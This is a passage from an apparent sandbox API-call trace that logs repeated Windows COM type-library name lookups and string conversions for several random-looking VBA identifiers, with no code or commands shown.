ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x6f003100000000, pDummy=0x0) returned 0x0 [0069.020] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61d96 | out: _Dst=0x144ec0) returned 0x0 [0069.020] ITypeComp:RemoteBind (in: This=0x665ba60, szName="JQ4QCX", lHashVal=0x108d5f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61e96, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="JQ4QCX") returned 7 [0069.020] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="JQ4QCX", lHashVal=0x108d5f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61e96, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="JQ4QCX") returned 7 [0069.021] ITypeComp:RemoteBind (in: This=0x665bd30, szName="JQ4QCX", lHashVal=0x108d5f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.021] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JQ4QCX") returned 0x108d5f [0069.021] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="JQ4QCX" | out: _Dst="JQ4QCX") returned 0x0 [0069.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="JQ4QCX") returned 7 [0069.021] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.021] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="JQ4QCX", lHashVal=0x108d5f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.021] IUnknown:Release (This=0x665ba50) returned 0xd [0069.021] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.021] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="JQ4QCX", lHashVal=0x108d5f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.021] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.021] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.021] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="JQ4QCX", lHashVal=0x108d5f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.021] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.021] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.021] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="JQ4QCX", lHashVal=0x108d5f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.021] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61e96, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="JQ4QCX") returned 7 [0069.021] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="JQ4QCX", lHashVal=0x108d5f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.021] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.021] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61e96 | out: _Dst=0x67c2d40) returned 0x0 [0069.021] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_JQ4QCX") returned 0x1007c9 [0069.021] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_JQ4QCX" | out: _Dst="_B_var_JQ4QCX") returned 0x0 [0069.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_JQ4QCX") returned 14 [0069.021] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.021] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_JQ4QCX", lHashVal=0x1007c9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.021] IUnknown:Release (This=0x665ba50) returned 0xd [0069.022] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.022] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_JQ4QCX", lHashVal=0x1007c9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.022] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.022] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.022] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_JQ4QCX", lHashVal=0x1007c9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.022] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.022] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.022] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_JQ4QCX", lHashVal=0x1007c9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.022] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.022] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.022] IUnknown:Release (This=0x665ba50) returned 0xd [0069.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10a6e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_JQ4QCX") returned 14 [0069.022] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_JQ4QCX", lHashVal=0x1007c9, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0) returned 0x0 [0069.022] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61e96 | out: _Dst=0x144ec0) returned 0x0 [0069.022] ITypeComp:RemoteBind (in: This=0x665ba60, szName="vk_DAA", lHashVal=0x102031, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61e6e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vk_DAA") returned 7 [0069.022] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="vk_DAA", lHashVal=0x102031, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61e6e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vk_DAA") returned 7 [0069.022] ITypeComp:RemoteBind (in: This=0x665bd30, szName="vk_DAA", lHashVal=0x102031, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.022] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vk_DAA") returned 0x102031 [0069.022] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="vk_DAA" | out: _Dst="vk_DAA") returned 0x0 [0069.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="vk_DAA") returned 7 [0069.022] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.022] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="vk_DAA", lHashVal=0x102031, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.023] IUnknown:Release (This=0x665ba50) returned 0xd [0069.023] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.023] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="vk_DAA", lHashVal=0x102031, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.023] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.023] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.023] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="vk_DAA", lHashVal=0x102031, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.023] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.023] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.023] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="vk_DAA", lHashVal=0x102031, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.023] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61e6e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vk_DAA") returned 7 [0069.023] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="vk_DAA", lHashVal=0x102031, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.023] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.023] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61e6e | out: _Dst=0x67c2d40) returned 0x0 [0069.023] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_vk_DAA") returned 0x109ada [0069.023] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_vk_DAA" | out: _Dst="_B_var_vk_DAA") returned 0x0 [0069.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_vk_DAA") returned 14 [0069.023] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.023] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_vk_DAA", lHashVal=0x109ada, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.023] IUnknown:Release (This=0x665ba50) returned 0xd [0069.023] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.023] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_vk_DAA", lHashVal=0x109ada, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.023] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.023] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.023] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_vk_DAA", lHashVal=0x109ada, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.023] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.023] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.023] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_vk_DAA", lHashVal=0x109ada, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.024] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.024] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.024] IUnknown:Release (This=0x665ba50) returned 0xd [0069.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10a9e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_vk_DAA") returned 14 [0069.024] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_vk_DAA", lHashVal=0x109ada, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.024] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61e6e | out: _Dst=0x144ec0) returned 0x0 [0069.024] ITypeComp:RemoteBind (in: This=0x665ba60, szName="DAxQAk", lHashVal=0x10b29a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61ebe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="DAxQAk") returned 7 [0069.024] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="DAxQAk", lHashVal=0x10b29a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61ebe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="DAxQAk") returned 7 [0069.024] ITypeComp:RemoteBind (in: This=0x665bd30, szName="DAxQAk", lHashVal=0x10b29a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.024] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DAxQAk") returned 0x10b29a [0069.024] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="DAxQAk" | out: _Dst="DAxQAk") returned 0x0 [0069.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="DAxQAk") returned 7 [0069.024] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.024] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="DAxQAk", lHashVal=0x10b29a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.024] IUnknown:Release (This=0x665ba50) returned 0xd [0069.024] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.024] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="DAxQAk", lHashVal=0x10b29a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.024] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.024] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.024] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="DAxQAk", lHashVal=0x10b29a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.024] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.024] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.025] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="DAxQAk", lHashVal=0x10b29a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.025] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61ebe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="DAxQAk") returned 7 [0069.025] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="DAxQAk", lHashVal=0x10b29a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.025] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.025] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61ebe | out: _Dst=0x67c2d40) returned 0x0 [0069.025] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DAxQAk") returned 0x102d04 [0069.025] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_DAxQAk" | out: _Dst="_B_var_DAxQAk") returned 0x0 [0069.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_DAxQAk") returned 14 [0069.025] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.025] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_DAxQAk", lHashVal=0x102d04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.025] IUnknown:Release (This=0x665ba50) returned 0xd [0069.025] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.025] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_DAxQAk", lHashVal=0x102d04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.025] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.025] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.025] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_DAxQAk", lHashVal=0x102d04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.025] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.025] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.025] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_DAxQAk", lHashVal=0x102d04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.025] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.025] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.025] IUnknown:Release (This=0x665ba50) returned 0xd [0069.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10ace, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_DAxQAk") returned 14 [0069.025] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_DAxQAk", lHashVal=0x102d04, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0) returned 0x0 [0069.025] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61ebe | out: _Dst=0x144ec0) returned 0x0 [0069.026] ITypeComp:RemoteBind (in: This=0x665ba60, szName="aAUUA1", lHashVal=0x1032a9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61ee6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aAUUA1") returned 7 [0069.026] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="aAUUA1", lHashVal=0x1032a9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61ee6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aAUUA1") returned 7 [0069.026] ITypeComp:RemoteBind (in: This=0x665bd30, szName="aAUUA1", lHashVal=0x1032a9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.026] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aAUUA1") returned 0x1032a9 [0069.026] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="aAUUA1" | out: _Dst="aAUUA1") returned 0x0 [0069.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="aAUUA1") returned 7 [0069.026] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.026] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="aAUUA1", lHashVal=0x1032a9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.026] IUnknown:Release (This=0x665ba50) returned 0xd [0069.026] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.026] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="aAUUA1", lHashVal=0x1032a9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.026] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.026] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.026] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="aAUUA1", lHashVal=0x1032a9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.026] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.026] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.026] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="aAUUA1", lHashVal=0x1032a9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.026] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61ee6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aAUUA1") returned 7 [0069.026] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="aAUUA1", lHashVal=0x1032a9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.026] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.026] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61ee6 | out: _Dst=0x67c2d40) returned 0x0 [0069.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aAUUA1") returned 0x10ad52 [0069.027] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_aAUUA1" | out: _Dst="_B_var_aAUUA1") returned 0x0 [0069.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_aAUUA1") returned 14 [0069.027] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.027] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_aAUUA1", lHashVal=0x10ad52, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.027] IUnknown:Release (This=0x665ba50) returned 0xd [0069.027] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.027] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_aAUUA1", 